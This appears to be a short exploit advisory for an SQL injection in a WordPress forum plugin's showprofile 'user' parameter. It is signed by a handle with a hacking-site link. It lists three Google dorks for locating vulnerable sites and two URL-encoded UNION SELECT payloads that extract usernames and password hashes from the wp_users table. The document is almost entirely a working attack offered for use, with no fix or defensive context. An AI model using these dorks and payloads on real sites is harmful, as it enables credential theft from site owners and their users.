#########################################################################
# 
#  WordPress forumaction(PAGE_&#304;D)(user)SQL Injection
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com/ 
#
#########################################################################
# 
#  DORK 1 : allinurl: forumaction "showprofile"
# 
   DORK 2 : allinurl: page_id user "showprofile"

   DORK 3 : allinurl:"forum/?forumaction"

##########################################################################
#
#  showprofile&user=SQL Injection(EXPLO&#304;T)
#
###########################################################################
  
  EXPLO&#304;T 1

showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2C0%2C0%2C0x7c%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users
  
  EXPLO&#304;T 2

showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0x7c%2C0%2C0%2C0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users


##########################################################################
# S@BUN                   GOOD LUCKY                 S@BUN 
##########################################################################